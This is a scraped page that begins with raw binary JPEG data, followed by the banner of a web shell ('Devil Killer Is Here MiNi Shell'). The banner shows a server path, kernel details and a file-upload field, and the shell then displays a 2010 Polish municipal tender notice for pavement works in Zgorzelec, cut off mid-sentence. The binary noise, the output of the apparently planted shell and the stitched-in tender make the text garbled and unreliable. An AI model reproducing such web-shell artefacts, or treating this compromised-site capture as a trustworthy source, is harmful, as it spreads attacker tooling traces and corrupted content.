JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100903/276500-N-2010.html

<p class="kh_header"><b>Zgorzelec: Modernizacja nawierzchni ul. Karłowicza</b><br>
<b>Numer ogłoszenia: 276500 - 2010; data zamieszczenia: 03.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Zgorzelec , ul. Domańskiego 7, 59-900 Zgorzelec, woj. dolnośląskie, tel. 0-75 77 56 988, faks 075 77 56 988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.um-zgorzelec.dolnyslask.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja nawierzchni ul. Karłowicza.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.   Przedmiotem zamówienia jest modernizacja nawierzchni  ul. Karłowicza w Zgorzelcu.
2.  Zakres przedmiotu zamówienia obejmuje przebudowę nawierzchni chodnika przy ul. Karłowicza oraz budowę miejsc postojowych przy budynku ul. Karłowicza 10. 

3.  Zakres prac przebudowy nawierzchni chodnika i budowy miejsc postojowych przy 
     budynku ul. Karłowicza 10 obejmuje:
     1) Roboty ziemne - korytowanie pod konstrukcję nawierzchni miejsc postojowych 
         i drogi manewrowej oraz ławy betonowe krawężników z wywozem gruntu na 
         wysypisko wg wyboru Wykonawcy z kosztami składowania, w tym wywóz 
         humusu w ilości  34,70m3  składowany na odległość do 4 km na hałdzie do 
         ponownego wbudowania - 100.389m3 . 
     2) Roboty ziemne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne 
         miejsc postojowych i drogi manewrowej - 231.50m2 . 
     3) Przebudowę kabla eANN wraz z zabezpieczeniem rurą osłonową: 
         a) kopanie rowów dla kabli w sposób ręczny w gruncie kat. IV. Odkopanie 
             istniejącego kabla eANN, wykop liniowy w nowej trasie kabla celem 
             przełożenia - 12.46m2 , 
         b) ułożenie rury osłonowej DVK110mm Arot - 30.80m, 
         c) układanie kabla eANN w rurze osłonowej - 30,80m, 
         d) zasypanie z zagęszczeniem rowu rury osłonowej AROT - 11,23m.
     4) Wykonanie nawierzchni z kostki betonowej brukowej gr. 8 cm na podsypce 
         piaskowej z wypełnieniem spoin piaskiem, droga manewrowa - 125,00m, 
     5) Wykonanie nawierzchni z płyty betonowej ażurowej (tzw. zielona) o 
         wymiarach 0,60x0,40x0,10 na podsypce piaskowej - miejsca postojowe należy 
         wykonać z podziałem stanowisk,  rzędem kostki betonowej  brukowej 
         szerokości 10 cm w kolorze, następnie zasypanie humusem i obsianie trawą w 
         ilości  106,50m2 .
     6) Rozbiórkę obrzeży betonowych w ilości 823,30mb, 
     7) Rozbiórkę krawężników betonowych o wymiarach15x30cm w ilości 348,00mb, 
     8) Rozbiórkę płyt betonowych chodników o wymiarach 35x35x5 i 50x50x7cm 
         w ilości 1.099,00m2 , 
     9) Rozbiórkę ogrodzeń z rur i kształtowników stalowych (niskich) terenów 
         zielonych - 431,30m2 , 
   10) Rozbiórkę nawierzchni betonowej (w tym terenowe schody blokowe betonowe) 
         - 431,30m2 , 
   11) Rozbiórkę płyt betonowych typu trylinki - 50,00m2 , 
   12) Wywóz gruzu betonowego z rozbiórki na wysypisko komunalne, 
   13) Wykonanie korytowania pod konstrukcje nawierzchni chodników, dojazdu, ław 
         betonowych,  krawężników i obrzeży - 380,96m3 , 
   14) Wykonanie podbudowy chodników z kruszywa łamanego 0-31,5 mm, grubości 
        10cm, stabilizowana mechanicznie - 931,60m2 , 
   15) Wykonanie podbudowy dojazdu placu manewrowo-postojowego z kruszywa 
         łamanego 0-31,5mm, grubości 15cm, stabilizowana mechanicznie - 702,70m2 
   16) Wykonanie krawężników betonowych wystających, obniżonych na zjazdach 
        15x30cm z wykonaniem ław  betonowych z betonu C12/12 o Fb= 0,007m2 - 
        350,00mb, 
   17) Wykonanie obrzeży betonowych o wymiarach 8x 30 cm na ławie betonowej z 
        betonu C12/15 o  Fb=0.04m2  - 839,70mb, 
   18) Wykonanie chodników z kostki betonowej brukowej szarej grubości 8 cm na 
          podsypce piaskowej z wypełnieniem spoin piaskiem w ilości 661,20m2 , 
   19) Wykonanie placu manewrowo - postojowego z kostki betonowej brukowej 
        szarej grubości 8 cm na podsypce piaskowej z wypełnieniem spoin piaskiem - 
        646,70m2 , 
   20) Wykonanie dojazdów z kostki betonowej brukowej kolorowej grubości  8 cm 
         na podsypce piaskowej z wypełnieniem spoin piaskiem, 
   21) Wykonanie schodów terenowych z obrzeży betonowych o wymiarach 8x30cm  
        na ławie betonowej i podłożu z betonu C12/15 z wypełnieniem kostką betonową 
        brukową 8x30 cm na podsypce cementowo-wapiennej - 12 stopni, 
   22) Wykonanie ścieku z kostki kamiennej  w ilości 184,34m, 
   23) Odtworzenie trawników poprzez zakładanie nowych trawników z 
        przygotowaniem podłoża z ziemi urodzajnej - 560,00m2 , 
   24) Wykonanie trawników dywanowych siewem na gruncie kat. III bez nawożenia 
        w ilości 220,00m2 
   25) Wykonanie wycinki drzew z mechanicznym karczowaniem pni, usunięciem, 
        oczyszczeniem terenu z pozostałości po ścięciu i wykarczowaniu  w ilości 2 
        szt., 
   26) Sadzenie drzew - klon kulisty h= 1,50m - form naturalnych na terenie płaskim
        w gruncie kat. I-II z zaprawą do połowy głębokości dołów; średnica/głębokość 
        0,5m w ilości  3 szt., 
   27) Sadzenie krzewów żywopłotowych - ligustr pospolity, w rowach o szerokości 
        do 45 cm w gruncie  kat. III z zaprawą rowów do połowy głębokości - 110 szt., 
   28) Wykonanie remontu cząstkowego nawierzchni bitumicznej wzdłuż 
         przebudowywanego krawężnika kamiennego - 3.08,00t, 
   29) Wykonanie regulacji pionowej włazów kanałowych w ilości 4 szt., 
   30) Wykonanie regulacji pionowej skrzynek zaworowych w ilości 4 szt., 
   31) Wykonanie regulacji pionowej wpustów ulicznych w ilości 6 szt., 
   32) Wykonanie regulacji pionowej nakryw studni telekomunikacyjnych w ilości 3 szt.
4. Szczegółowy opis i zakres robót dla zadania objętego modernizacją nawierzchni 
    chodnika i  miejsc postojowych przy ul. Karłowicza  został zawarty   w 
    dokumentacji projektowej składającej się z opisu technicznego, planu 
    zagospodarowania terenu, mapy orientacyjnej przedmiaru robót i Specyfikacji 
    Technicznej Wykonania i Odbioru Robót- załącznik nr 9 do SIWZ.     
5. Zobowiązuje się Wykonawcę do opracowania kompletnej dokumentacji 
     powykonawczej w 2-ch  egzemplarzach  i przekazanie jej Zamawiającemu 
     wraz ze zgłoszeniem gotowości robót  budowlanych do odbioru.  
     W skład kompletnej dokumentacji powykonawczej wchodzi:
     1) inwentaryzacja geodezyjna powykonawcza, 
     2) atesty i certyfikaty wbudowanych materiałów, prefabrykatów lub urządzeń
     3) aprobaty techniczne, 
     4) uzupełniony dziennik budowy, 
     5) wymagane przepisami, protokoły i zaświadczenia z przeprowadzonych przez 
         Wykonawcę badań i sprawdzeń,       
     6) oświadczenie kierownika budowy  o zgodności wykonania obiektu budowlanego
         z projektem budowlanym, warunkami pozwolenia na budowę, przepisami i 
         obowiązującymi Polskimi Normami oraz oświadczenie kierownika budowy o 
         doprowadzeniu do należytego stanu i porządku terenu budowy, a także 
         sąsiedniej ulicy, nieruchomości, 
     7) oświadczenie właściciela terenu na którym prowadzona była inwestycja o 
          przywróceniu terenu do stanu pierwotnego,   
     8) w  przypadku zmian nie odstępujących w sposób istotny od zatwierdzonego 
         projektu i warunków zgłoszenia robót niewymagających pozwolenia na 
         budowę, Wykonawca  dołączy kopie rysunków wchodzących  w skład 
         zatwierdzonego projektu  budowlanego, z naniesionymi zmianami i 
         uzupełniającym opisem, w takim przypadku oświadczenie kierownika budowy 
         powinno być zatwierdzone przez Projektanta i Inspektora Nadzoru, 
     9) oświadczenie kierownika budowy o wbudowaniu materiałów, na które 
         dostarczono  dokumenty odbiorowe,  
    10) oświadczenie Inspektora Nadzoru Inwestorskiego o zgodności wykonania 
         obiektu budowlanego z projektem budowlanym,   przepisami  i  obowiązującymi 
         Polskimi Normami, 
    11) pisemną gwarancję jakości na wykonany przedmiot umowy, z treści 
         dokumentu gwarancyjnego powinno wynikać, na co jest udzielona gwarancja, 
         jak długo gwarancja obejmuje, 
 6. Wykonawca jako wytwórca odpadów w rozumieniu art. 3 ust. 3 pkt 22 ustawy o 
     odpadach, ma obowiązek zagospodarowania odpadów powstałych podczas 
     realizacji zamówienia, zgodnie z ustawą o odpadach z dnia 27 kwietnia 2001r. 
     (tekst jednolity z 2007r. Dz. U. Nr 39, poz. 251 z późn. zm.)  i ustawą Prawo 
     ochrony środowiska  z dnia 27 kwietnia 2001r. (tekst jednolity z 2008r. Dz. U. Nr 
     25, poz.150 z późn.zm). 
  7. Wykonawca przedstawi Zamawiającemu potwierdzenie zagospodarowania 
     odpadów zgodnie z powszechnie obowiązującymi przepisami.        
  8.  Wykonawca przed przystąpieniem do realizacji robót budowlanych, przedstawi 
      Zamawiającemu wykonany i zatwierdzony projekt tymczasowej organizacji ruchu 
      na  czas trwania robót budowlanych.  
 9.  Przed przystąpieniem do w/w robót Wykonawca winien   dokonać wizji lokalnej 
      terenu, objętego robotą budowlaną, celem zapoznania się z warunkami realizacji 
      przedmiotu zamówienia.  Wizję lokalną Wykonawca dokona na koszt własny. 
10. Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia zgodnie z 
      dokumentacją projektową, przedmiarem robót, technologią wskazaną przez 
      Projektanta, zgodnie z zasadami wiedzy  technicznej, normami,  wskazaniami 
      Zamawiającego, oraz obowiązującymi   przepisami.

11. Wykonawca wykona przedmiot umowy z materiałów własnych, które powinny 
      odpowiadać co do jakości wymogom wyrobów dopuszczonych do obrotu i 
      stosowania w budownictwie zgodnie z  art. 10 ustawy z dnia 7 lipca 1994r. 
      Prawo budowlane (tekst jednolity z 2006r. Dz. U. Nr 156, poz. 1118 z poźn.zm.).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty budowlane polegające na powtórzeniu tego samego rodzaju zamówień, stanowiące nie więcej niż 50% wartości zamówienia podstawowego, zgodnie z art. 67 ust. 1 pkt. 6 ustawy Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 79.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.  Zamawiający żąda od wykonawców wniesienia wadium w wysokości 6 700,00 zł. PLN (słownie: sześć tysięcy siedemset zł.)
2.  Wykonawca obowiązany jest wnieść wadium przed upływem terminu składania ofert. Wadium musi być na koncie Zamawiającego przed upływem terminu składania   ofert.  
3.  Wykonawca, który nie wniesie wadium do upływu terminu składania ofert, na 
     przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 
     3 ustawy Pzp, albo nie zgodzi się na przedłużenie okresu związania ofertą 
     zostanie wykluczony z postępowania o udzielenie zamówienia, a oferta 
     Wykonawcy wykluczonego zostanie odrzucona zgodnie z art. 24 ust. 2 pkt. 4 
     ustawy Pzp.
4.  W zależności od woli wykonawcy wadium może być wnoszone w następujących  
     formach:
1)	pieniądzu,
2)   poręczeniach bankowych lub poręczeniach spółdzielczej  kasy oszczędnościowo-
      kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)   gwarancjach bankowych,
4)   gwarancjach ubezpieczeniowych,     
5)   poręczeniach udzielonych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2
      ustawy z dnia 09.11.2000r. o utworzeniu Polskiej Agencji Rozwoju 
      Przedsiębiorczości   (Dz.U. Nr 109, poz. 1158 z póź.zm.).
UWAGA!
Wadium wniesione w formach o których mowa w art. 45 ust. 6 pkt. 2-5 ustawy 
Pzp  musi gwarantować  Beneficjentowi zapłatę sumy gwarancyjnej jeżeli 
Wykonawca  w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 
ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których  mowa w art. 25 
ust. 1, lub pełnomocnictw.  
5.  Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego 
     wniesienie wadium do Zamawiającego.
6.  Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy
     Zamawiającego Nr 35124012971111000025654013 Bank PEKAO S.A. I
     O/Zgorzelec.
     Na przelewie należy  umieścić informację :
     Wadium na Modernizacja nawierzchni ul. Karłowicza                   
7.  Zamawiający zwróci wadium wszystkim wykonawcom niezwłocznie po wyborze
     najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem 
     wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z 
     zastrzeżeniem pkt. 24.13 SIWZ. 
8.  Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający 
     zwróci wadium niezwłocznie po zawarciu umowy w sprawie zamówienia 
     publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy.  
9.  Zamawiający zwróci niezwłocznie wadium na wniosek wykonawcy, który wycofał 
     ofertę przed  upływem terminu składania ofert. 
10.Zamawiający zażąda ponownego wniesienia wadium przez Wykonawcę, któremu
     zwrócono wadium na podstawie art. 46 ust. 1 ustawy Pzp , jeżeli w wyniku 
     ostatecznego rozstrzygnięcia odwołania jego oferta została wybrana jako 
     najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez 
     Zamawiającego. 
11.Jeżeli wadium wniesiono w pieniądzu, zamawiający zwróci je wraz z odsetkami
     wynikającymi z umowy rachunku bankowego, na którym było ono 
     przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz 
     prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez 
     wykonawcę .
12.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
     oferta  została wybrana :
     a/ odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
         określonych w ofercie, 
     b/ nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, 
     c/ zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z 
         przyczyn   leżących  po stronie wykonawcy.
13.Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w 
     odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył 
     dokumentów lub oświadczeń,   o których mowa w art. 25 ust. 1 ustawy Pzp, 
     chyba że udowodni, ze wynika to z przyczyn należących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
     dokumenty i oświadczenia.  
2)  Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3)  Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   

4)  Warunek będzie uznany za spełniony, jeżeli Wykonawca wykaże, iż wykonał: 
- dwie roboty budowlane polegające na budowie lub przebudowie 
   nawierzchni  z kostki betonowej brukowej o  łącznej wartości nie mniejszej 
   niż 410 000,00 zł.  brutto.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  Ocena spełnienia warunków udziału w postępowaniu dokonana zostanie zgodnie z 
     metodą  spełnia/nie spełnia,  w oparciu o przedłożone przez Wykonawców 
     dokumenty i oświadczenia.  
2)  Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające 
     spełnienie wymaganych warunków zostaną dopuszczone do badania i oceny.
3)  Wykonawcy, którzy nie przedłożą dokumentów i oświadczeń potwierdzających 
     spełnienie warunków udziału w postępowaniu zostaną wykluczeni z postępowania
     z zastrzeżeniem art. 26 ust. 3 ustawy Pzp.   
4)  Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, iż dysponuje  
minimum 1 osobą, która będzie wykonywać zamówienie,  posiadającą           
prawo wykonywania samodzielnych funkcji technicznych w budownictwie do 
kierowania robotami budowlanymi  w specjalności drogowej, wraz z informacją   
Wykonawcy o podstawie do dysponowania tą osobą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Do oferty Wykonawca musi załączyć następujące dokumenty:   
1)  wypełniony i podpisany formularz ofertowy (wg. załączonego wzoru), 
2)  informacja  na temat Wykonawcy (wg zał. wzoru ) - załącznik nr 1 do SIWZ
     (w przypadku złożenia oferty wspólnej, dokument składa każdy z członków 
     konsorcjum), 
3)  oświadczenie Wykonawcy z art. 36 ust. 4 ustawy z dnia 29.01.2004r. Prawo  
     zamówień   publicznych - załącznik nr 2 do SIWZ, 
     W przypadku nie dołączenia do oferty powyższego załącznika, bądź jego nie 
     wypełnienia, Zamawiający uzna, że Wykonawca wykona zamówienie
     własnymi siłami. 
  Uwaga!
  W przypadku kiedy Wykonawca będzie korzystał z wiedzy i doświadczenia innych 
  podmiotów, a nie załączy, bądź nie wypełni załącznika nr 2 do SIWZ do oferty, 
  Zamawiający nie będzie mógł uznać spełnienia warunku określonego w pkt. 
  11.1 pkt. 1 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewidział możliwość dokonania zmian postanowień umowy,  przy czym 
warunki takiej zmiany Zamawiający określił  w § 12 ust. 2  projektu umowy. 
1. Zakres przewidzianych zmian: 
1) termin określony w pkt. 4 SIWZ i § 3 ust. 1 projektu umowy  ulegnie  przesunięciu w przypadku wystąpienia opóźnień wynikających z:  
a) opóźnień zawinionych przez Zamawiającego, tzn. jeżeli takie opóźnienie jest lub    będzie miało wpływ na termin realizacji przedmiotu umowy w szczególności dot. 
przekazania terenu budowy, dokonywania odbiorów robót, oraz jakichkolwiek  
innych opóźnień lub  utrudnień,  ze strony Zamawiajacego, za które           
Wykonawca nie ponosi odpowiedzialności, 
b) opóźnień z powodu wystąpienia warunków   atmosferycznych uniemożliwiających 
